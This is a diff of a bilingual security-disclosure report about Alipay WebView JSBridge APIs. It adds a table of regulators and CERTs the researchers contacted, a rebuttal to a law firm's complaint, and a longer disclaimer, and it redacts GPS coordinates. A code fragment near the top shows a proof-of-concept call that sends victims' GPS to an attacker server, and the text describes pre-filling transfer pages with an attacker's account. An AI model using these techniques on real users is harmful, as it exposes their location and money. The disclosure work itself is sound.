// result = {lat: "[脱敏]", lng: "[脱敏]", city: "槟城"}
exfiltrate("GPS", result); // POST to attacker server
});
@@ -1039,13 +1305,14 @@ startActivity(i);
<span class="zh">三台设备 GPS 数据</span><span class="en">GPS Data from 3 Devices</span>
</div>
<pre><code>// Samsung S25 Ultra — Auckland, New Zealand
{"lat": -36.707669, "lng": 174.719378, "city": "奥克兰", "country": "新西兰", "accuracy": 25}
{"lat": "[脱敏]", "lng": "[脱敏]", "city": "奥克兰", "country": "新西兰", "accuracy": 25}
// Redmi 23129RN51X — Penang, Malaysia
{"lat": 5.460012, "lng": 100.314139, "city": "槟城", "country": "马来西亚", "accuracy": 35}
{"lat": "[脱敏]", "lng": "[脱敏]", "city": "槟城", "country": "马来西亚", "accuracy": 35}
// iPhone 16 Pro — Hangzhou, China
{"lat": 30.306882, "lng": 120.121303, "city": "杭州市"}</code></pre>
// iPhone 16 Pro — Hangzhou, China (厂商安全业务负责人设备全程无GPS授权声明/弹窗)
// 3轮测试精度: 17.4m → 8.8mlocationReducedAccuracy: 0精确定位页面加载到回传约7秒
{"lat": "[脱敏]", "lng": "[脱敏]", "city": "杭州市"}</code></pre>
</div>
</div>
@@ -1151,8 +1418,8 @@ startActivity(i);
"accuracy": 35,
"city": "槟城",
"country": "马来西亚",
"latitude": 5.460012,
"longitude": 100.314139
"latitude": "[脱敏]",
"longitude": "[脱敏]"
}
}
}
@@ -1493,7 +1760,7 @@ Language/zh-Hant Region/CN</code></pre>
<h3>我们的回应</h3>
<p>我们充分尊重厂商的判断。但以下事实不会因为判定结论而改变:</p>
<ol>
<li><strong>数据确实外传了。</strong> 308条服务器日志不是模拟的GPS坐标 5.460012, 100.314139 确实从支付宝 WebView 发送到了我们的服务器。这个事实不受"是否是漏洞"的判定影响。</li>
<li><strong>数据确实外传了。</strong> 308条服务器日志不是模拟的GPS 坐标(指向槟城市区)确实从支付宝 WebView 发送到了我们的服务器。这个事实不受"是否是漏洞"的判定影响。</li>
<li><strong>转账页面确实被外部触发了。</strong> <code>startApp</code> 返回 <code>success: true</code>,转账页面确实打开了,攻击者的账号确实被预填了。这个事实不受"是否是漏洞"的判定影响。</li>
<li><strong>用户没有被充分告知。</strong> "继续访问"警告中<strong>没有</strong>告诉用户"该网站将获得调用支付宝内部API的能力包括读取您的GPS位置、打开转账页面等"。用户不知道点击"继续访问"意味着什么。</li>
<li><strong>防护机制的不一致性。</strong> 既然 <code>clipboard</code><code>getUserInfo</code> 被正确拦截了,那 <code>getLocation</code><code>startApp</code> 为什么不需要同样的保护同一个安全框架对不同API的处理方式不一致这至少说明有改进空间。</li>
@@ -1512,7 +1779,7 @@ Language/zh-Hant Region/CN</code></pre>
<h3>Our Response</h3>
<p>We fully respect the vendor's judgment. However, the following facts do not change based on the classification decision:</p>
<ol>
<li><strong>Data was indeed exfiltrated.</strong> The 308 server log entries are not simulated. GPS coordinates 5.460012, 100.314139 were indeed transmitted from Alipay WebView to our server. This fact is independent of whether it's classified as a "vulnerability."</li>
<li><strong>Data was indeed exfiltrated.</strong> The 308 server log entries are not simulated. GPS coordinates (pointing to Penang urban area) were indeed transmitted from Alipay WebView to our server. This fact is independent of whether it's classified as a "vulnerability."</li>
<li><strong>The transfer page was indeed triggered externally.</strong> <code>startApp</code> returned <code>success: true</code>, the transfer page opened, and the attacker's account was pre-filled. This fact is independent of the classification.</li>
<li><strong>Users are not adequately informed.</strong> The "Continue to visit" warning does <strong>not</strong> tell users: "This website will gain the ability to call Alipay internal APIs, including reading your GPS location, opening transfer pages, etc." Users don't know what clicking "Continue" means.</li>
<li><strong>Defense mechanism inconsistency.</strong> If <code>clipboard</code> and <code>getUserInfo</code> are correctly blocked, why don't <code>getLocation</code> and <code>startApp</code> receive the same protection? The inconsistent treatment of different APIs within the same security framework at minimum indicates room for improvement.</li>
@@ -1528,6 +1795,244 @@ Language/zh-Hant Region/CN</code></pre>
</div>
</section>
<!-- ==================== 9.5 GLOBAL REGULATORY RESPONSE ==================== -->
<section id="global-response">
<h2><span class="num">09½</span>
<span class="zh">全球监管机构响应</span>
<span class="en">Global Regulatory Response</span>
</h2>
<div class="callout" style="border-color: var(--green); background: rgba(68,204,136,.06);">
<p>
<span class="zh"><strong>截至 2026-03-14</strong>:我们向全球 22 个国家/地区的约 160 个监管机构、CERT、隐私保护组织和安全社区发送了约 189 封安全通报邮件。以下是已收到明确受理结果的机构汇总。</span>
<span class="en"><strong>As of 2026-03-14</strong>: We sent approximately 189 security notification emails to ~160 regulatory bodies, CERTs, privacy authorities, and security communities across 22 countries/regions. Below is a summary of organizations that have provided definitive responses.</span>
</p>
</div>
<div class="zh">
<h3 style="color: var(--accent); margin-top: 24px;">一、正式调查/立案 (7个)</h3>
<div style="overflow-x: auto;">
<table style="width:100%; border-collapse:collapse; font-size:14px; margin:16px 0;">
<thead>
<tr style="background: var(--surface2); text-align:left;">
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">#</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">机构</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">国家</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">状态</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">关键信息</th>
</tr>
</thead>
<tbody>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">1</td>
<td style="padding:8px 12px;"><strong>HKMA 香港金融管理局</strong></td>
<td style="padding:8px 12px;">🇭🇰 香港</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>正式投诉立案</strong></td>
<td style="padding:8px 12px;">零售支付监管处高级主任受理SVF储值支付工具牌照持有人正式投诉表格已提交7日确认窗口</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">2</td>
<td style="padding:8px 12px;"><strong>PDPC 新加坡个人数据保护委员会</strong></td>
<td style="padding:8px 12px;">🇸🇬 新加坡</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>正在调查</strong></td>
<td style="padding:8px 12px;">隐私保护委员会正式立案调查</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">3</td>
<td style="padding:8px 12px;"><strong>Apple Product Security</strong></td>
<td style="padding:8px 12px;">🇺🇸 美国</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>转交调查团队</strong></td>
<td style="padding:8px 12px;">Apple 产品安全团队人工回复确认,已将报告转发给专门调查团队,正在调查 Alipay iOS 端 JSBridge 暴露的高危 API</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">4</td>
<td style="padding:8px 12px;"><strong>Google Play</strong></td>
<td style="padding:8px 12px;">🇺🇸 美国</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>政策违规调查</strong></td>
<td style="padding:8px 12px;">"We will investigate and take appropriate action"</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">5</td>
<td style="padding:8px 12px;"><strong>MITRE CVE</strong></td>
<td style="padding:8px 12px;">🇺🇸 美国</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>6个CVE待分配</strong></td>
<td style="padding:8px 12px;">通过 CNA-LR 路径提交6个CVE请求CVSS 7.49.3),已确认收到</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">6</td>
<td style="padding:8px 12px;"><strong>CSSF 卢森堡金融监管委员会</strong></td>
<td style="padding:8px 12px;">🇱🇺 卢森堡</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>Whistleblowing立案 + ICT Risk确认</strong></td>
<td style="padding:8px 12px;">4个部门/通道确认收到Whistleblowing团队立案 + ICT Risk Supervision 人工确认×2 + Reclamation确认ICT风险监管部门明确表示"已知悉报告内容",已提交补充证据(联动 2025 年反洗钱处罚记录)</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">7</td>
<td style="padding:8px 12px;"><strong>Packet Storm Security</strong></td>
<td style="padding:8px 12px;">🇺🇸 美国</td>
<td style="padding:8px 12px; color: var(--green);"><strong>已公开发布</strong></td>
<td style="padding:8px 12px;"><a href="https://packetstorm.news/files/id/217089" target="_blank">Advisory #217089</a> — "Alipay Open Redirect / API Attacker Payload Insertion"</td>
</tr>
</tbody>
</table>
</div>
<h3 style="color: var(--yellow); margin-top: 24px;">二、确认收到并转交/处理中 (11个)</h3>
<div style="overflow-x: auto;">
<table style="width:100%; border-collapse:collapse; font-size:14px; margin:16px 0;">
<thead>
<tr style="background: var(--surface2); text-align:left;">
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">#</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">机构</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">国家</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">回复内容</th>
</tr>
</thead>
<tbody>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">1</td><td style="padding:8px 12px;"><strong>CIRCL 卢森堡CERT</strong></td><td style="padding:8px 12px;">🇱🇺 卢森堡</td><td style="padding:8px 12px;">事件处理分析师人工回复,<strong>已代我们联系 Alibaba Security Response Center</strong></td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">2</td><td style="padding:8px 12px;"><strong>ANSSI / CERT-FR 法国</strong></td><td style="padding:8px 12px;">🇫🇷 法国</td><td style="padding:8px 12px;">"已转交相关部门处理,将尽快回复"</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">3</td><td style="padding:8px 12px;"><strong>HKCERT 香港</strong></td><td style="padding:8px 12px;">🇭🇰 香港</td><td style="padding:8px 12px;"><strong>已正式转交CNCERT</strong>(中国国家互联网应急中心)</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">4</td><td style="padding:8px 12px;"><strong>FMA 新西兰金融管理局</strong></td><td style="padding:8px 12px;">🇳🇿 新西兰</td><td style="padding:8px 12px;">"信息已记录,正在考虑是否对 Alipay 采取进一步行动"</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">5</td><td style="padding:8px 12px;"><strong>FCA 英国金融行为监管局</strong></td><td style="padding:8px 12px;">🇬🇧 英国</td><td style="padding:8px 12px;">Whistleblowing 团队确认收到,正在审查(涉及 AIUK Services Limited, 原 Alipay UK Ltd</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">6</td><td style="padding:8px 12px;"><strong>DNB 荷兰央行</strong></td><td style="padding:8px 12px;">🇳🇱 荷兰</td><td style="padding:8px 12px;">Cyber Defense Center 确认收到,引导至监管通道处理</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">7</td><td style="padding:8px 12px;"><strong>OJK 印尼金融监管局</strong></td><td style="padding:8px 12px;">🇮🇩 印尼</td><td style="padding:8px 12px;">要求补充详细说明,已回复完整技术报告</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">8</td><td style="padding:8px 12px;"><strong>OAIC 澳大利亚信息专员</strong></td><td style="padding:8px 12px;">🇦🇺 澳大利亚</td><td style="padding:8px 12px;">Intake 团队确认收到投诉</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">9</td><td style="padding:8px 12px;"><strong>EDPB 欧盟数据保护委员会</strong></td><td style="padding:8px 12px;">🇪🇺 欧盟</td><td style="padding:8px 12px;">确认收到跨境数据保护投诉</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">10</td><td style="padding:8px 12px;"><strong>ThaiCERT 泰国</strong></td><td style="padding:8px 12px;">🇹🇭 泰国</td><td style="padding:8px 12px;">"已转交负责人"</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">11</td><td style="padding:8px 12px;"><strong>BNM 马来西亚央行</strong></td><td style="padding:8px 12px;">🇲🇾 马来西亚</td><td style="padding:8px 12px;">工单确认收到</td></tr>
</tbody>
</table>
</div>
<h3 style="color: var(--text2); margin-top: 24px;">三、自动确认/模板回复 (8个)</h3>
<p>BSP 菲律宾央行、OSFI 加拿大金融监管、Privacy International、ProPublica、CNA/Mediacorp 新加坡、Datatilsynet 丹麦数据保护、DSB 奥地利数据保护、IMY 瑞典数据保护。</p>
<h3 style="margin-top: 24px;">情况概述</h3>
<div class="callout info">
<ul style="margin:0; padding-left: 20px;">
<li>总发送 <strong>~189 封</strong>,覆盖 <strong>22 个国家/地区</strong>,约 160 个目标</li>
<li>送达率 <strong>~90%</strong>(退信经过 4 轮修正补发)</li>
<li>收到回复 <strong>39+ 个</strong>(回复率 ~23%</li>
<li><strong>7 个正式调查/立案</strong>HKMA、PDPC、Apple、Google、MITRE、CSSF、Packet Storm</li>
<li><strong>CIRCL 卢森堡国家CERT</strong> 主动代我们联系 Alibaba Security Response Center</li>
<li><strong>HKCERT → CNCERT</strong>:唯一能直接触达中国大陆实体的监管路径已启动</li>
</ul>
</div>
<p style="margin-top:16px; color: var(--text2); font-size: 13px;"><em>注:为保护正在进行中的调查程序,部分案件编号和联系人邮箱已脱敏。本表将随调查进展持续更新。</em></p>
</div>
<div class="en">
<h3 style="color: var(--accent); margin-top: 24px;">I. Formal Investigations / Case Filed (7)</h3>
<div style="overflow-x: auto;">
<table style="width:100%; border-collapse:collapse; font-size:14px; margin:16px 0;">
<thead>
<tr style="background: var(--surface2); text-align:left;">
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">#</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">Organization</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">Country</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">Status</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">Key Information</th>
</tr>
</thead>
<tbody>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">1</td>
<td style="padding:8px 12px;"><strong>HKMA (Hong Kong Monetary Authority)</strong></td>
<td style="padding:8px 12px;">🇭🇰 Hong Kong</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>Formal Complaint Filed</strong></td>
<td style="padding:8px 12px;">Assigned to Senior Officer at Retail Payment Oversight Division. SVF licensee complaint form submitted.</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">2</td>
<td style="padding:8px 12px;"><strong>PDPC (Personal Data Protection Commission)</strong></td>
<td style="padding:8px 12px;">🇸🇬 Singapore</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>Under Investigation</strong></td>
<td style="padding:8px 12px;">Formal investigation case opened.</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">3</td>
<td style="padding:8px 12px;"><strong>Apple Product Security</strong></td>
<td style="padding:8px 12px;">🇺🇸 USA</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>Forwarded to Investigation Team</strong></td>
<td style="padding:8px 12px;">Human response from Product Security confirming report forwarded to investigation team. Investigating high-risk JSBridge APIs exposed on Alipay iOS.</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">4</td>
<td style="padding:8px 12px;"><strong>Google Play</strong></td>
<td style="padding:8px 12px;">🇺🇸 USA</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>Policy Violation Investigation</strong></td>
<td style="padding:8px 12px;">"We will investigate and take appropriate action."</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">5</td>
<td style="padding:8px 12px;"><strong>MITRE CVE</strong></td>
<td style="padding:8px 12px;">🇺🇸 USA</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>6 CVEs Pending Assignment</strong></td>
<td style="padding:8px 12px;">6 CVE requests submitted via CNA-LR pathway (CVSS 7.49.3). Receipt confirmed.</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">6</td>
<td style="padding:8px 12px;"><strong>CSSF (Luxembourg Financial Regulator)</strong></td>
<td style="padding:8px 12px;">🇱🇺 Luxembourg</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>Whistleblowing Case + ICT Risk Confirmed</strong></td>
<td style="padding:8px 12px;">4 departments/channels acknowledged (Whistleblowing case filed + ICT Risk Supervision confirmed ×2 + Reclamation confirmed). ICT Risk Supervision explicitly stated they "take note of the contents." Supplementary evidence submitted linking to 2025 AML penalty.</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">7</td>
<td style="padding:8px 12px;"><strong>Packet Storm Security</strong></td>
<td style="padding:8px 12px;">🇺🇸 USA</td>
<td style="padding:8px 12px; color: var(--green);"><strong>Published</strong></td>
<td style="padding:8px 12px;"><a href="https://packetstorm.news/files/id/217089" target="_blank">Advisory #217089</a></td>
</tr>
</tbody>
</table>
</div>
<h3 style="color: var(--yellow); margin-top: 24px;">II. Acknowledged & Transferred (11)</h3>
<div style="overflow-x: auto;">
<table style="width:100%; border-collapse:collapse; font-size:14px; margin:16px 0;">
<thead>
<tr style="background: var(--surface2); text-align:left;">
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">#</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">Organization</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">Country</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">Response</th>
</tr>
</thead>
<tbody>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">1</td><td style="padding:8px 12px;"><strong>CIRCL (National CERT Luxembourg)</strong></td><td style="padding:8px 12px;">🇱🇺</td><td style="padding:8px 12px;">Incident handler responded personally. <strong>Contacted Alibaba SRC on our behalf.</strong></td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">2</td><td style="padding:8px 12px;"><strong>ANSSI / CERT-FR</strong></td><td style="padding:8px 12px;">🇫🇷</td><td style="padding:8px 12px;">"Forwarded to the appropriate department."</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">3</td><td style="padding:8px 12px;"><strong>HKCERT</strong></td><td style="padding:8px 12px;">🇭🇰</td><td style="padding:8px 12px;"><strong>Forwarded to CNCERT</strong> (China's National CERT).</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">4</td><td style="padding:8px 12px;"><strong>FMA</strong></td><td style="padding:8px 12px;">🇳🇿</td><td style="padding:8px 12px;">"Considering whether to take further action."</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">5</td><td style="padding:8px 12px;"><strong>FCA</strong></td><td style="padding:8px 12px;">🇬🇧</td><td style="padding:8px 12px;">Whistleblowing team reviewing (AIUK Services Ltd, formerly Alipay UK Ltd).</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">6</td><td style="padding:8px 12px;"><strong>DNB</strong></td><td style="padding:8px 12px;">🇳🇱</td><td style="padding:8px 12px;">Cyber Defense Center acknowledged, routed to supervisory channel.</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">7</td><td style="padding:8px 12px;"><strong>OJK</strong></td><td style="padding:8px 12px;">🇮🇩</td><td style="padding:8px 12px;">Requested details. Full technical report provided.</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">8</td><td style="padding:8px 12px;"><strong>OAIC</strong></td><td style="padding:8px 12px;">🇦🇺</td><td style="padding:8px 12px;">Intake team confirmed receipt.</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">9</td><td style="padding:8px 12px;"><strong>EDPB</strong></td><td style="padding:8px 12px;">🇪🇺</td><td style="padding:8px 12px;">Acknowledged cross-border data protection complaint.</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">10</td><td style="padding:8px 12px;"><strong>ThaiCERT</strong></td><td style="padding:8px 12px;">🇹🇭</td><td style="padding:8px 12px;">"Forwarded to the responsible person."</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">11</td><td style="padding:8px 12px;"><strong>BNM</strong></td><td style="padding:8px 12px;">🇲🇾</td><td style="padding:8px 12px;">Ticket acknowledged.</td></tr>
</tbody>
</table>
</div>
<h3 style="color: var(--text2); margin-top: 24px;">III. Auto-Acknowledgments (8)</h3>
<p>BSP (Philippines), OSFI (Canada), Privacy International, ProPublica (USA), CNA/Mediacorp (Singapore), Datatilsynet (Denmark), DSB (Austria), IMY (Sweden).</p>
<h3 style="margin-top: 24px;">Overview</h3>
<div class="callout info">
<ul style="margin:0; padding-left: 20px;">
<li>Total sent: <strong>~189 emails</strong> across <strong>22 countries/regions</strong>, ~160 targets</li>
<li>Delivery rate: <strong>~90%</strong> (bounces corrected through 4 rounds)</li>
<li>Responses: <strong>39+</strong> (~23% response rate)</li>
<li><strong>7 formal investigations</strong>: HKMA, PDPC, Apple, Google, MITRE, CSSF, Packet Storm</li>
<li><strong>CIRCL</strong> proactively contacted Alibaba SRC on our behalf</li>
<li><strong>HKCERT → CNCERT</strong>: The only pathway to mainland China entities activated</li>
</ul>
</div>
<p style="margin-top:16px; color: var(--text2); font-size: 13px;"><em>Note: To protect ongoing investigations, certain case reference numbers and contact emails have been redacted. This table will be updated as investigations progress.</em></p>
</div>
</section>
<!-- ==================== 10. RECOMMENDATIONS ==================== -->
<section id="recommendations">
<h2><span class="num">10</span>
@@ -1627,34 +2132,134 @@ Language/zh-Hant Region/CN</code></pre>
</table>
</section>
<!-- ==================== LEGAL RESPONSE ==================== -->
<section id="legal-response">
<h2><span class="num">⚖️</span>
<span class="zh">法律投诉回应</span>
<span class="en">Legal Complaint Response</span>
</h2>
<div class="zh">
<div class="callout" style="border-left:4px solid var(--accent);background:rgba(255,68,68,.08);padding:20px;border-radius:0 8px 8px 0;margin-bottom:24px;">
<p style="margin-bottom:12px;"><strong>投诉单号:</strong>[已隐藏]</p>
<p style="margin-bottom:12px;"><strong>投诉时间:</strong>2026-03-11 22:45:59文章发布仅4小时29分钟后</p>
<p style="margin-bottom:12px;"><strong>投诉方:</strong>北京格韵律师事务所(证件号 31110000MD0196493T</p>
<p style="margin-bottom:12px;"><strong>投诉分类:</strong>内容侵犯名誉/商誉/隐私/肖像</p>
<p style="margin-bottom:0;"><strong>投诉平台:</strong>微信公众平台</p>
</div>
<h3>我们的立场:投诉不成立</h3>
<p><strong>1. 文章未指名任何企业</strong> — 我们在微信公众号发布的文章全文零次出现"支付宝""Alipay""蚂蚁集团"或任何可识别特定企业的名称。根据《民法典》第1024条名誉权/商誉侵权需满足"针对特定主体"的构成要件。投诉方通过主动投诉,反而自行确认了文章内容与其委托人的关联性。</p>
<p><strong>2. 内容属实且有完整证据链</strong> — 根据《民法典》第1025条行为人为公共利益实施舆论监督影响他人名誉的不承担民事责任前提是内容属实且未超出合理限度。我们的文章基于308条服务器日志、3台真实设备测试、42张截图。所有结论均可独立复现验证。</p>
<p><strong>3. 厂商安全团队亲自验证了漏洞</strong> — 在私下报告阶段,厂商安全团队指派业务负责人与我们协同验证。该人员使用自有 iPhone 16 Pro 在杭州测试时GPS 坐标被直接回传至我们的服务器,<strong>全程无任何 GPS 授权弹窗</strong>。这直接推翻了投诉方"调用位置权限均以弹窗告知用户"的主张。此次验证还发现 iOS 版本攻击面显著大于 Android——额外暴露 tradePay支付SDK、share蠕虫传播等 5 个敏感 API。</p>
<p><strong>4. 厂商自身定性消除侵权基础</strong> — 厂商安全团队在亲自验证上述事实后仍于2026年3月10日回复"这些属于正常功能"。讨论一款应用的"正常功能"从逻辑上不可能构成"商誉侵权"。当企业明知风险存在而选择不修复,再通过法律手段阻止公众知情——这不是维权,这是掩盖。</p>
<p><strong>5. 消费者知情权</strong> — 《消费者权益保护法》第八条规定消费者享有知悉其购买、使用的商品或者接受的服务的真实情况的权利。当10亿+用户的支付工具存在可被外部链接利用的功能设计时,安全研究和公众讨论属于正当行使公共监督权。</p>
<p><strong>6. 负责任披露程序完整合规</strong> — 我们在公开前进行了4轮私下报告2026-02-25至2026-03-07等待厂商回应至明确答复"正常功能"。参照 ISO/IEC 29147:2018 和 Google Project Zero 90天标准我们的程序完全合规。</p>
<p>我们已向微信公众平台提交完整申诉材料。如投诉方对技术事实有异议,欢迎通过第三方技术鉴定机构验证。</p>
<p style="font-size:14px;color:var(--text2);margin-top:20px;"><strong>详细反驳文章:</strong><a href="https://innora.ai/zfb/rebuttal.html">支付宝安全研究遭律师函投诉——一篇零次提及"支付宝"的文章如何构成"商誉侵权"</a></p>
</div>
<div class="en">
<div class="callout" style="border-left:4px solid var(--accent);background:rgba(255,68,68,.08);padding:20px;border-radius:0 8px 8px 0;margin-bottom:24px;">
<p style="margin-bottom:12px;"><strong>Complaint #:</strong> [redacted]</p>
<p style="margin-bottom:12px;"><strong>Filed:</strong> 2026-03-11 22:45:59 (only 4 hours 29 minutes after article publication)</p>
<p style="margin-bottom:12px;"><strong>Complainant:</strong> Beijing Geyun Law Firm (License: 31110000MD0196493T)</p>
<p style="margin-bottom:12px;"><strong>Category:</strong> Content infringing reputation/goodwill/privacy/likeness</p>
<p style="margin-bottom:0;"><strong>Platform:</strong> WeChat Official Account Platform</p>
</div>
<h3>Our Position: The Complaint Has No Merit</h3>
<p><strong>1. The article names no company</strong> — Our WeChat article contains zero mentions of "Alipay," "支付宝," "Ant Group," or any identifiable corporate name. Under PRC Civil Code Article 1024, reputation infringement requires targeting a "specific subject." By filing this complaint, the complainant effectively self-identified their client as the article's subject.</p>
<p><strong>2. All content is factual and evidence-backed</strong> — Under PRC Civil Code Article 1025, one shall not bear civil liability for supervising public interest when the content is truthful and does not exceed reasonable limits. Our article is based on 308 server logs, testing across 3 real devices, and 42 screenshots. All findings are independently reproducible.</p>
<p><strong>3. The vendor's own security team verified the vulnerability</strong> — During the private reporting phase, the vendor assigned a security business lead to coordinate and verify our findings. When this person tested on their own iPhone 16 Pro in Hangzhou, GPS coordinates were transmitted directly to our server with <strong>no authorization prompt whatsoever</strong>. This directly contradicts the complainant's claim that "location access always prompts the user." This verification also revealed that the iOS attack surface is significantly larger than Android — exposing 5 additional sensitive APIs including tradePay (payment SDK) and share (worm propagation vector).</p>
<p><strong>4. The vendor's own classification eliminates infringement</strong> — After personally verifying all the above facts, the vendor's security team still responded on 2026-03-10: "These are normal features." Discussing an app's "normal features" cannot logically constitute "reputation infringement." When a company knowingly ignores verified risks and then uses legal means to suppress public awareness — that is not rights protection, it is concealment.</p>
<p><strong>5. Consumer right to know</strong> — PRC Consumer Rights Protection Law Article 8 guarantees consumers the right to know the true conditions of products and services they use. When a payment tool used by 1B+ users has features exploitable via external links, security research and public discussion serve the legitimate public interest.</p>
<p><strong>6. Responsible disclosure fully compliant</strong> — We submitted 4 rounds of private reports (2026-02-25 to 2026-03-07) before public disclosure. We waited for the vendor's explicit response ("normal features"). Per ISO/IEC 29147:2018 and Google Project Zero's 90-day standard, our process is fully compliant.</p>
<p>We have submitted complete appeal materials to the WeChat platform. If the complainant disputes the technical facts, we welcome verification through an independent third-party technical assessment.</p>
<p style="font-size:14px;color:var(--text2);margin-top:20px;"><strong>Full rebuttal article:</strong> <a href="https://innora.ai/zfb/rebuttal.html">How Can an Article That Never Mentions "Alipay" Constitute "Reputation Infringement"?</a></p>
</div>
</section>
<!-- ==================== DISCLAIMER ==================== -->
<section>
<h2>
<span class="zh">免责声明</span>
<span class="en">Disclaimer</span>
<span class="zh">法律声明与免责</span>
<span class="en">Legal Notice & Disclaimer</span>
</h2>
<div class="callout info">
<div class="zh">
<h3 style="margin-top:0;">研究性质声明</h3>
<ul>
<li>本研究完全出于安全研究和教育目的,符合《宪法》第四十七条规定的科学研究自由。</li>
<li>所有测试均在研究者自己的设备和自有账户上进行,未对任何第三方系统造成损害。</li>
<li>研究团队为独立安全研究机构,不从事支付业务,与任何竞品企业不存在商业利益关系。</li>
</ul>
<h3>负责任披露合规声明</h3>
<ul>
<li>在公开发布之前已通过4轮私下报告2026-02-25至2026-03-07向厂商提交全部发现及修复建议。</li>
<li>厂商于2026-03-10正式回复"属于正常功能",明确拒绝修复。</li>
<li>研究者在厂商明确关闭对话后公开研究结果,符合 ISO/IEC 29147:2018 负责任披露标准。</li>
<li>公开内容均为厂商已知的技术事实,不构成"未经授权发布网络安全信息"《网络安全法》第26条</li>
</ul>
<h3>法律依据</h3>
<ul>
<li><strong>《民法典》第1025条</strong>:为公共利益实施舆论监督,内容属实且未超出合理限度的,不承担民事责任。</li>
<li><strong>《消费者权益保护法》第8条</strong>:消费者享有知悉其使用的服务真实情况的权利。</li>
<li><strong>《民法典》第1024条</strong>:名誉权侵权需针对特定主体——本文未指名任何企业。</li>
<li><strong>CVSS 3.1</strong>:国际通用漏洞评分体系明确认定"需用户交互"的安全问题仍属有效安全发现。</li>
</ul>
<h3>内容安全声明</h3>
<ul>
<li>本研究完全出于安全研究和教育目的。</li>
<li>所有测试均在研究者自己的设备上进行。</li>
<li>测试账户为研究者本人账户。</li>
<li>在公开发布之前,已通过多轮负责任披露向蚂蚁集团报告了全部发现。</li>
<li>厂商回复这些是"正常功能",因此公开讨论不存在任何法律或道德问题。</li>
<li>本文不包含任何可直接用于攻击的完整 PoC 代码(关键参数已脱敏)。</li>
<li>在线演示页面为只读展示,已禁用全部数据外传功能。</li>
<li>我们对每个发现都诚实标注了验证状态,包括防护生效的部分。</li>
<li>文章中涉及资金操作的描述均明确注明"仍需用户手动确认"。</li>
</ul>
</div>
<div class="en">
<h3 style="margin-top:0;">Research Nature Statement</h3>
<ul>
<li>This research was conducted solely for security research and educational purposes, in accordance with the freedom of scientific research guaranteed by Article 47 of the PRC Constitution.</li>
<li>All testing was performed on the researcher's own devices and accounts. No third-party systems were harmed.</li>
